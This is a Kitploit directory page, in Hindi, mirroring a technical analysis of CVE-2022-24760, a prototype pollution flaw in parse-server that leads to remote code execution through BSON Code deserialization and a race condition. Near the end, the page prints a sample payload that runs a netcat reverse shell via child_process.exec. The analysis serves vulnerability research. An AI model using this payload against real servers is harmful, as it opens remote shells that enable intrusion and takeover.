Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-24760 — CVE-2022-24760 का विस्तृत तकनीकी विश्लेषण, parse-server में एक प्रोटोटाइप प्रदूषण भेद्यता जो BSON सीरियलाइजेशन और रेस कंडीशन शोषण के माध्यम से रिमोट कोड निष्पादन की ओर ले जाती है। | Kitploit
उपकरण/GitHubGitHub/tuo4n8/cve-2022-24760
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषण
GitHubtuo4n8/cve-2022-24760

CVE-2022-24760

CVE-2022-24760 का विस्तृत तकनीकी विश्लेषण, parse-server में एक प्रोटोटाइप प्रदूषण भेद्यता जो BSON सीरियलाइजेशन और रेस कंडीशन शोषण के माध्यम से रिमोट कोड निष्पादन की ओर ले जाती है।

रिपॉजिटरी देखें
1464 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-24760


प्रवाह

image-20220331114046018

image-20220331114258164

  • डिफ़ॉल्ट रूप से DB में क्लास जोड़ने, हटाने या संशोधित करने के लिए कुंजी की आवश्यकता नहीं है

image-20220331115258271


Diff commit

https://github.com/parse-community/parse-server/commit/886bfd7cac69496e3f73d4bb536f0eec3cba0e4d

image-20220331132344135

  • Prototype pollution expandResultOnKeyPath फ़ंक्शन में होता है
root@kitploit:~
DatabaseController.js sanitizeDatabaseResult -> expandResultOnKeyPath
  • sanitizeDatabaseResult का उपयोग नई क्लास add और update करते समय किया जाता है। हालांकि, prototype को प्रदूषित करने के लिए शर्त यह है कि keyUpdate __op को ['Add', 'AddUnique', 'Remove', 'Increment'] में से एक होना चाहिए।

  • इसलिए, prototype मान केवल array या number हो सकते हैं

    • image-20220331132813075
    • image-20220331132823843
  • नमूना अनुरोध इस प्रकार है:

image-20220331133133587

RCE के लिए सिंक शोषण

  • DB पर डेटा सहेजने से पहले, डेटा प्रवाह BSON लाइब्रेरी के माध्यम से serialize किया जाता है; जब _bsontype Code होता है, तो यह serializeCode निष्पादित करता है

image-20220331133328243

​ parse-server-4.10.6/node_modules/bson/lib/bson/parser/serializer.js:762

  • फिर, डेटा को deserialize किया जाता है ताकि सिंक तक पहुंचा जा सके:

image-20220331145339371

image-20220331145403962

image-20220331145421339

  • Prototype pollution का उपयोग करके options['evalFunctions'] को प्रदूषित करें -> isolateEval फ़ंक्शन तक बाईपास करें
  • नमूना पेलोड
root@kitploit:~
"_bsontype":"Code","code":"asdasd;require('child_process').exec('rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f')"
  • चूंकि expandResultOnKeyPath फ़ंक्शन का निष्पादन deserialize के बाद होता है, इसलिए isolateEval तक पहुंचने पर इसे ट्रिगर करने के लिए बार-बार रेस कंडीशन निष्पादित करना आवश्यक है।

image-20220331145825647

टूल डाउनलोड करें